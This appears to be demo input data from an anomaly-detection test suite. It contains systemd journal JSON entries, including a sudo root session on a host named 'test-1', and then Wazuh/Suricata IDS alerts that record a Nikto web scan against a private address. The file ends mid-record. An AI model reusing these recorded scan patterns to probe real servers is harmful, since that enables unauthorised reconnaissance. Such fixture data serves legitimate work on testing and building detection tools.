"e08cb56c58754a8398efac483a1dba4d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229248" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36c;b=e2b08827b5804427b422c10c84f1567e;m=9f39539;t=5bd16e6b714a0;x=400e7f2353aa30d4", "__REALTIME_TIMESTAMP" : "1615280941241504", "__MONOTONIC_TIMESTAMP" : "166958393", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache (access for web browsers).", "USER_UNIT" : "gpg-agent-browser.socket", "USER_INVOCATION_ID" : "b39e086c7b804706842cb5400720e511", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229328" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36d;b=e2b08827b5804427b422c10c84f1567e;m=9f395ca;t=5bd16e6b71531;x=52761cb2e41930ca", "__REALTIME_TIMESTAMP" : "1615280941241649", "__MONOTONIC_TIMESTAMP" : "166958538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", 
"SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache (restricted).", "USER_UNIT" : "gpg-agent-extra.socket", "USER_INVOCATION_ID" : "ee556158c4bf463385dec9fc66af4c30", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229417" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36e;b=e2b08827b5804427b422c10c84f1567e;m=9f39631;t=5bd16e6b71599;x=5184e17a5bcb18ae", "__REALTIME_TIMESTAMP" : "1615280941241753", "__MONOTONIC_TIMESTAMP" : "166958641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", 
"_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Paths.", "USER_UNIT" : "paths.target", "USER_INVOCATION_ID" : "e5185ac070ea4df98a4b00c613372bef", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229430" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36f;b=e2b08827b5804427b422c10c84f1567e;m=9f39694;t=5bd16e6b715fb;x=8814a2efb8bec83b", "__REALTIME_TIMESTAMP" : "1615280941241851", "__MONOTONIC_TIMESTAMP" : "166958740", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG network certificate management daemon.", "USER_UNIT" : "dirmngr.socket", "USER_INVOCATION_ID" : "55274947c49b4c41b3476d8adca963a3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229505" } { "__CURSOR" : 
"s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=370;b=e2b08827b5804427b422c10c84f1567e;m=9f39702;t=5bd16e6b71669;x=46fe52ce71c1fcf7", "__REALTIME_TIMESTAMP" : "1615280941241961", "__MONOTONIC_TIMESTAMP" : "166958850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache.", "USER_UNIT" : "gpg-agent.socket", "USER_INVOCATION_ID" : "1f52d7a7d03443b58a9f67be9e3267f8", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229589" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=371;b=e2b08827b5804427b422c10c84f1567e;m=9f3976b;t=5bd16e6b716d2;x=ca1e497010c4b6c5", "__REALTIME_TIMESTAMP" : "1615280941242066", "__MONOTONIC_TIMESTAMP" : "166958955", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", 
"_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Sockets.", "USER_UNIT" : "sockets.target", "USER_INVOCATION_ID" : "57308a089fb44c85aa8b28764208cbb1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229604" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=372;b=e2b08827b5804427b422c10c84f1567e;m=9f397cd;t=5bd16e6b71734;x=c94451d35f946e0", "__REALTIME_TIMESTAMP" : "1615280941242164", "__MONOTONIC_TIMESTAMP" : "166959053", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Basic System.", "USER_UNIT" : "basic.target", "USER_INVOCATION_ID" : "9279cf273e684a6cb8f893a4238d4ce9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229614" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=373;b=e2b08827b5804427b422c10c84f1567e;m=9f3982d;t=5bd16e6b71795;x=cfe3a72a477d7ed5", "__REALTIME_TIMESTAMP" : "1615280941242261", "__MONOTONIC_TIMESTAMP" : "166959149", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "user@1000.service", "INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "MESSAGE" : "Started User Manager for UID 1000.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229762" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=374;b=e2b08827b5804427b422c10c84f1567e;m=9f398b2;t=5bd16e6b71819;x=759f2aa62d425194", "__REALTIME_TIMESTAMP" : "1615280941242393", "__MONOTONIC_TIMESTAMP" : "166959282", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", 
"_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Default.", "USER_UNIT" : "default.target", "USER_INVOCATION_ID" : "deceef39a2384492929e08a3ad22033b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941231978" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=375;b=e2b08827b5804427b422c10c84f1567e;m=9f39918;t=5bd16e6b71880;x=c18702b1dbf43c11", "__REALTIME_TIMESTAMP" : "1615280941242496", "__MONOTONIC_TIMESTAMP" : "166959384", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/core/manager.c", "CODE_LINE" : "3272", "CODE_FUNC" : "manager_notify_finished", "MESSAGE_ID" : "eed00a68ffd84e31882105fd973abdd1", "USERSPACE_USEC" : 
"179998", "MESSAGE" : "Startup finished in 179ms.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941232011" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=376;b=e2b08827b5804427b422c10c84f1567e;m=bc70466;t=5bd16e88a83cd;x=4643ca9ef29700d7", "__REALTIME_TIMESTAMP" : "1615280971875277", "__MONOTONIC_TIMESTAMP" : "197592166", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_UID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "SYSLOG_IDENTIFIER" : "sudo", "MESSAGE" : " ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/bash", "_PID" : "1234", "_GID" : "1000", "_COMM" : "sudo", "_EXE" : "/usr/bin/sudo", "_CMDLINE" : "sudo -i", "_AUDIT_SESSION" : "1", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/session-1.scope", "_SYSTEMD_SESSION" : "1", "_SYSTEMD_UNIT" : "session-1.scope", "_SYSTEMD_INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280971874922" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=377;b=e2b08827b5804427b422c10c84f1567e;m=bc71293;t=5bd16e88a91fb;x=c5d63933ce56dcfb", "__REALTIME_TIMESTAMP" : "1615280971878907", "__MONOTONIC_TIMESTAMP" : "197595795", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "SYSLOG_IDENTIFIER" : "sudo", "_PID" : "1234", "_COMM" : "sudo", "_EXE" : "/usr/bin/sudo", "_CMDLINE" : "sudo -i", 
"_AUDIT_SESSION" : "1", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/session-1.scope", "_SYSTEMD_SESSION" : "1", "_SYSTEMD_UNIT" : "session-1.scope", "_SYSTEMD_INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "MESSAGE" : "pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280971878330" }logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/wazuh.log000066400000000000000000005173051437606560100315340ustar00rootroot00000000000000{"timestamp":"2020-03-04T19:18:35.196472+0000","rule":{"level":6,"description":"IDS event.","id":"20101","firedtimes":1,"mail":false,"groups":["ids"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.5603","full_log":"03/04/2020-19:18:35.196472 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:47564 -> 192.168.10.154:80","predecoder":{"timestamp":"03/04/2020-19:18:35.196472"},"decoder":{"parent":"snort","name":"snort"},"data":{"srcip":"192.168.10.238","dstip":"192.168.10.154:80","id":"1:2221030:1"},"location":"/var/log/forensic/suricata/fast.log"} {"timestamp":"2020-03-04T19:18:34.343787+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":1,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.6012","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.343787+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46938,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol 
Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.343787+0000","flow_id":"2066313044966357.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46938","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ncf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.345338+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":2,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.7549","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.345338+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46940,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.345338+0000","flow_id":"1697602987508313.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46940","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.Htm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.347250+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":3,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.9086","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.347250+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46942,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.csc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.347250+0000","flow_id":"1217064866564597.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46942","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.csc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.349169+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":4,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.10623","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.349169+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46944,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.el\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.349169+0000","flow_id":"883960087990575.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46944","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.el","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.351261+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":5,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.12157","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.351261+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46946,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant 